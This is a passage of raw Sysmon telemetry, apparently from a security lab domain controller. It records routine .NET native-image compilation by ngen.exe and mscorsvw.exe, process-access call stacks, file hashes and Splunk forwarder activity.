\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.577{4DB9351A-A26C-60D3-1B05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\01KKPPDUZK\System.Xaml.ni.dll.auxMD5=D65DF9F3D32C2244FADF050D7ED38EB0,SHA256=F6B55DAE115F3B0A73B3C721F0EAEB62C1C62F126E02C16D304CAEA473935A8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.577{4DB9351A-A26C-60D3-1B05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\01KKPPDUZK\System.Xaml.ni.dllMD5=DD8D47026E122E60E51A0CB4F94023CF,SHA256=C3862AEBB30F0FE096B0873D6DDB1E7C13BC77E91E602B8239FAD50A9EEE2D6F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.405{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1B05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000022469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.263{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61456-false10.0.1.12-8000- 10341000x800000000000000022468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.374{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1B05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.374{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1B05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.374{4DB9351A-A26C-60D3-1A05-00000000CF01}6352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7V4IFP7MM9\System.Configuration.Install.ni.dll.auxMD5=A2282F6A18007D965E2FC8F3CE70F356,SHA256=F3CDBDE20C230B5D848E35B0C839BBE52E17F6DF23D735FF51674D2871D1EB25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.374{4DB9351A-A26C-60D3-1A05-00000000CF01}6352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7V4IFP7MM9\System.Configuration.Install.ni.dllMD5=47E73BD97BC224F2B43A80D0DE2CD420,SHA256=513E1D7CBD1A945A57A4F734A22D9DCCE61B1B81754C590CF0E48DBC7109D133,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1A05-00000000CF01}6352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1A05-00000000CF01}6352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1A05-00000000CF01}6352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-A26C-60D3-1905-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8GA5IPXY59\CustomMarshalers.ni.dll.auxMD5=3EC9F98A25D806CC49EBBEC3771F1CFA,SHA256=9BF86FCB8670A3F1F6A00C8E19298F6221B3DF94E51050C7B185EA664A26E974,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-A26C-60D3-1905-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8GA5IPXY59\CustomMarshalers.ni.dllMD5=A542743061673FED6CA63E04366BD183,SHA256=527615162A5BD9E7A3E78E0F7567478B00D1AE33E9085C2FA10F4C4659ABBA00,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.280{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1905-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.265{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1905-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.265{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1905-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.249{4DB9351A-A26C-60D3-1805-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JO3N82PQTY\System.Web.Services.ni.dll.auxMD5=914EB68BCAC967CB8DD7591EF4BEC9BB,SHA256=EDE554E244C8916871C0FE90AB00662E27C994FAC349BDE1C9BD388D607BFCBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.249{4DB9351A-A26C-60D3-1805-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JO3N82PQTY\System.Web.Services.ni.dllMD5=874FF562C1018A88838F4FE21D534C1E,SHA256=75168520F20010B9B010207164BFF0B1338CE4325578642E3EDEF4C086020CD6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.124{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1805-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.108{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1805-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.108{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1805-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.093{4DB9351A-A26C-60D3-1705-00000000CF01}2228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C0RHHG0FS8\System.Transactions.ni.dll.auxMD5=2EB1DDA39AAE496E32D8CFF25B83C617,SHA256=6FDB374475BC9313FFE1B683DD8BF9110BCFF28E972A392350C939F0F83A0813,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.093{4DB9351A-A26C-60D3-1705-00000000CF01}2228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C0RHHG0FS8\System.Transactions.ni.dllMD5=983BEA46B19A36052C5CB631D5E50DA3,SHA256=194F96344E6DBE13AD4A7564CE9786B61C809058EC6F33EC6595738F67C51CAD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.030{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1705-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.015{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1705-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.015{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1705-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.015{4DB9351A-A26B-60D3-1605-00000000CF01}2408NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EGZR5KHJ2B\System.DirectoryServices.ni.dll.auxMD5=552BA52BCA8F39CEBE9473586B8BFCB1,SHA256=89192B22F3E0BEB60BA843A18C8EB37B5F98377166AA26EC74CD308DC7972F0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.999{4DB9351A-A26B-60D3-1605-00000000CF01}2408NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EGZR5KHJ2B\System.DirectoryServices.ni.dllMD5=E5750590D0AE25606061EF861D7F0A8F,SHA256=C059019E71CBB20405C6FBB68C1A3B055CCB0745030A864163AC76ECCC895E7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.733{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDAFD0CBEB236B0D308876C4160B5A79,SHA256=924C16CBF495CADD6F3E0412123D1E05512586E80CC0E7D85915061C0D44AB72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.673{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26D-60D3-2205-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 